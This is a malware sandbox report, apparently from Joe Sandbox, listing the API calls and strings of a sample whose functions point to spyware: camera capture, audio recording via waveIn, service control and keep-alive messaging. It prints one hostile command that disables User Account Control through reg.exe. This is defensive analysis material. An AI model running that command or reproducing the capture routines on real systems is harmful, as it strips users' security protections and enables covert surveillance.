                                                                                          • API ID: __cftoe
                                                                                          • String ID:
                                                                                          • API String ID: 4189289331-0
                                                                                          • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                                                          • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                                                                          • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                                                          • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                          • String ID: a/p$am/pm
                                                                                          • API String ID: 2936374016-3206640213
                                                                                          • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                                                                          • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                                                                          • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                                                                          • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                                                                          • int.LIBCPMT ref: 0040F8D7
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                            • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                          • std::_Facet_Register.LIBCPMT ref: 0040F917
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040F97F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                          • String ID:
                                                                                          • API String ID: 3815856325-0
                                                                                          • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                                                          • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                                                                          • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                                                          • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                          • String ID:
                                                                                          • API String ID: 493672254-0
                                                                                          • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                                                                          • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                                                                          • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                                                                          • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                          • _free.LIBCMT ref: 0044575C
                                                                                          • _free.LIBCMT ref: 00445784
                                                                                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                                                                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                          • _abort.LIBCMT ref: 004457A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                                          • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                                                                          • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                                                                          • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                                                                          • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                                                                          • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                                                                          • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                                                                          • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                                                                          • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                                                                          • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                                                                          • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                                                                          • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                                                                          • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                          • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                                          • String ID: h G
                                                                                          • API String ID: 1958988193-3300504347
                                                                                          • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                                                                          • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                                                                          • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                                                                          • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                                                                          APIs
                                                                                          • RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                          • GetLastError.KERNEL32 ref: 0041B335
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                          • String ID: 0$MsgWindowClass
                                                                                          • API String ID: 2877667751-2410386613
                                                                                          • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                          • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                                                                          • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                          • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                                                            • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00437631
                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                          • String ID: /zC
                                                                                          • API String ID: 2633735394-4132788633
                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                          • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                          • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                                                                          APIs
                                                                                          • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                                                                          • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                                                                          • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                                                                          • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID: ]tA
                                                                                          • API String ID: 4116985748-3517819141
                                                                                          • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                          • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                                                                          • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                          • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
• C:\Windows\System32\cmd.exe, xrefs: 0040E542
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
• Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
• Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
• Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
• FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
• Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
• Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
• Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
• SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
• CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
Strings
• Connection KeepAlive | Disabled, xrefs: 004050D9
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: Connection KeepAlive | Disabled
• API String ID: 2993684571-3818284553
• Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
• Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
• Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
• Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
APIs
  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
• PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
• Sleep.KERNEL32(00002710), ref: 00418DBD
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
• Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
• Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
• Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
• Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
• Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
• Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
APIs
• Sleep.KERNEL32(00000000,?), ref: 004044A4
  • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
• API String ID: 3469354165-3547787478
• Opcode ID: cf4fac54dc614f6b24d057e9d973ce543428a8baf8f9bf4efbfe368f6e52cd5d
• Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
• Opcode Fuzzy Hash: cf4fac54dc614f6b24d057e9d973ce543428a8baf8f9bf4efbfe368f6e52cd5d
• Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
APIs
  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
• _free.LIBCMT ref: 00442318
• _free.LIBCMT ref: 0044232F
• _free.LIBCMT ref: 0044234E
• _free.LIBCMT ref: 00442369
• _free.LIBCMT ref: 00442380
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
• Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
• Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
• Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
• Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: _free
• API String ID: 269201875-0
• Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
• Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
• Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
• Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
• __alloca_probe_16.LIBCMT ref: 0044E391
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
• __freea.LIBCMT ref: 0044E3FD
  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• API String ID: 313313983-0
• Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
• Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
• Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
• Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
• waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
• waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
• waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
• waveInStart.WINMM ref: 00401CDE
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• API String ID: 1356121797-0
• Opcode ID: 3b58d0c680de98a2238f286cb7f614a66765342de8d6d8e6ba78ff9c64c57b7c
• Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
• Opcode Fuzzy Hash: 3b58d0c680de98a2238f286cb7f614a66765342de8d6d8e6ba78ff9c64c57b7c
• Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044C543
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
• _free.LIBCMT ref: 0044C59F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
